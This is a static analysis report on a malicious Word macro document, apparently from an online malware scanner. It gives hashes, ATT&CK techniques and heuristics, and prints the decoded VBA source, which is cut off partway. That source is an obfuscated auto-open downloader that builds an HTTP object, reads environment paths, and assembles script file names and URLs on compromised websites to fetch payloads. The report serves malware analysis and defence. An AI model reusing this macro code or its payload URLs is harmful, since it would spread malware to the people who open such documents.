Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 54047e6692e3ab22…

MALICIOUS

Office (OLE)

119.0 KB Created: 2015-07-27 20:08:00 Authoring application: Microsoft Office Word First seen: 2018-10-07
MD5: 0e2d65241d6e4c68aba332be4f8e010b SHA-1: a5651a9b9829dc271734c3c1974356ebd3c2c342 SHA-256: 54047e6692e3ab2282a2216d3d07abe7e29bfe4d25d23577994ff6c4c39841f4
230 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information T1204.002 Malicious File

The document contains multiple auto-executing VBA macros (AutoOpen, Workbook_Open) designed to run upon opening. The VBA script utilizes `CreateObject` to instantiate `MSXML2.ServerXMLHTTP` and attempts to download content from a URL, likely to fetch a second-stage payload. The `Environ()` function is also called, suggesting it may attempt to gather system information. The document body presents a fake renewal notice to lure the user into enabling macros.

Heuristics 9

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/rights/In document text (OLE body)
    • http://www.iec.chIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9642 bytes
SHA-256: 2c0dd138f03a927d190a030b45f10307652a43262edac8d5b59ba05777099734
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Public Function Xjdkhjfwefw(a As Object)
Xjdkhjfwefw = (a.responseText)
End Function
 





Attribute VB_Name = "Module2"
 
Public Function Goabc(sps As String)
BHJQVDQWVSS = "g21he 2g1hcf1c12e"
BHJQVDQWVSS = "g21he 2g1hcf1c12e"
BHJQVDQWVSS = "g21he 2g1hcf1c12e"
Goabc = Environ(sps)
End Function
Public Function Linolium(nbqjbdjqw As String)
Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, VjwiqdhqkwjHJhjkahsdjsakDD As Object, AHUDWQI As String
Dim ashdUHhda As String, hausd As Integer, JQHWDJQWB As String
ashdUHhda = nbqjbdjqw
hausd = Tan(11) + 225
'asdsad
JQHWDJQWB = "E"
JQHWDJQWB = "G" + JQHWDJQWB + Chr(88 + 4 * hausd)
BQDHJQWDGWQJGS = "MS" + Chr(93 + 5 * hausd) + "ML2.ServerXMLH" & Chr(85 + hausd) & Chr(84) & Chr(80)
'Hukqjdhjksahd
Set VjwiqdhqkwjHJhjkahsdjsakDD = CreateObject(BQDHJQWDGWQJGS)
VjwiqdhqkwjHJhjkahsdjsakDD.Open JQHWDJQWB, ashdUHhda
VjwiqdhqkwjHJhjkahsdjsakDD.Send (AHUDWQI)
Linolium = Module1.Xjdkhjfwefw(VjwiqdhqkwjHJhjkahsdjsakDD)
End Function
Sub Crispy(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub









Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

 Sub Mjqwdkklq_Open()
     
End Sub
Sub Ajdqljwd_Open()
     
End Sub
Sub Auto_Open()
    Unjqwkdqwh
End Sub
Sub Unjqwkdqwh()
    BQJDQW = "1j2hejk ghj21ge 21"
    Sqjdklasdsj
End Sub
Sub Giqjwdhqwkjq()
    NBJQJWD = "hje 12"
End Sub
Sub AutoOpen()
    NJQWDQ = "12jhe 12g"
    Unjqwkdqwh
End Sub

Sub Workbook_Open()
    VQDWQ = "1b2hjeg"
    Auto_Open
End Sub
 
Sub Sqjdklasdsj()

    
    Dim fallout As Integer, silkroad As Integer, inclife As Integer
    Dim hnquhdjincinc As Integer
    Dim retVal As Variant, gana As Integer, incturakk As Integer, kaladd As Integer, BWBBNS As String, KOLYHDN As String
    KOLYHDN = Chr(90 + 2)
    
    
    ANGOLA = Ubqhwdhwqbd(13221) + ""
    BWBBNS = Chr(60 + 24) & "emp"
    QHDQUWH = ANGOLA
    FL2 = QHDQUWH
    PH2 = Module2.Goabc(BWBBNS) + KOLYHDN
    
    silkroad = 9
    jwnqdw = -1
    
    BOSNIA = 8719723
    BOSNIA = 1 + 1 + 113 + Sgn(jwnqdw)
    BALAGAN = BOSNIA
    

    JWIDJIAAA = ""
    QIWJDABB = "b"
    HUYFEA = QIWJDABB + "a" + Chr(116)
    PSFL = FL2 + Chr(40 + 6) + "ps1"
    
    gana = TRnqjdkqSjsadSS(1 - 300 * Sin(20))
    SSS = Chr(BALAGAN + 2 + gana)
    VBFL = FL2 + Chr(50 - 4) + "v" & Chr(90 + 8) & "" & SSS & ""
    BAFL = FL2 + Chr(TRnqjdkqSjsadSS(Fix(-22.043)) + 31 - 10 + 25 + gana + 2) + HUYFEA
    
    INTG = "" & "o" & "bject"
    KIWD = Chr(10 + 100 + TRnqjdkqSjsadSS(CInt(Len(BAFL)))) + "dul" & "e"
    AFTG = Chr(109) & KIWD
    
    SXEE = ""
    SXAA = ""
    SXE = SXEE & SXAA & "" & ""
    GNG = ".j" & "pg"
    SXE = ".exe"
    
    
    HUQD = Chr(30 + 16 + 1)
    ATTH = "http" + "://"
    BQHJDQ = "s" + "avep" + "ic" & Chr(46) & "s" & "u" + HUQD
     
    PSPTH = PH2 + PSFL
    VBPTH = PH2 + VBFL
    BAPTH = "jb2e j12hej12ge 21"
    ABPTH = PH2 + BAFL
    BAPTH = ABPTH
    JHQKWDQAASS = BQHJDQ
    
    Dim BALAGANHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
    
    DRT = 315
    BFT = 316
    CFT = 317
    DFT = 318
    EFT = 319
    Dim NUWDHUQHUQWDH As String
    NUWDHUQHUQWDH = "" + "USE" & "RPROFILE"
    Dim PBIn As String, asdwq As String, MIWDWQ As String
    
   
    
    TSTS = "." + "tx" + "t"
    CDDD = "78672738612836" + TSTS
    LNSS = "f" & "a" & "f" & "a" & "" + TSTS
    STT1 = "bvautumnc" + "olorrun.com/w" + "p-conte" + "nt/the" + "mes/min" + "amaze/li" + "b/exte" + "ntions/pret" + "tyPho" + "to/im" + "ages/"
    STT2 = "iberianfurniturerental.com/w" + "p-con" + "tent/plug" + "ins/next" + "gen-gal" + "lery/ad" + "min/js/Jc" + 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.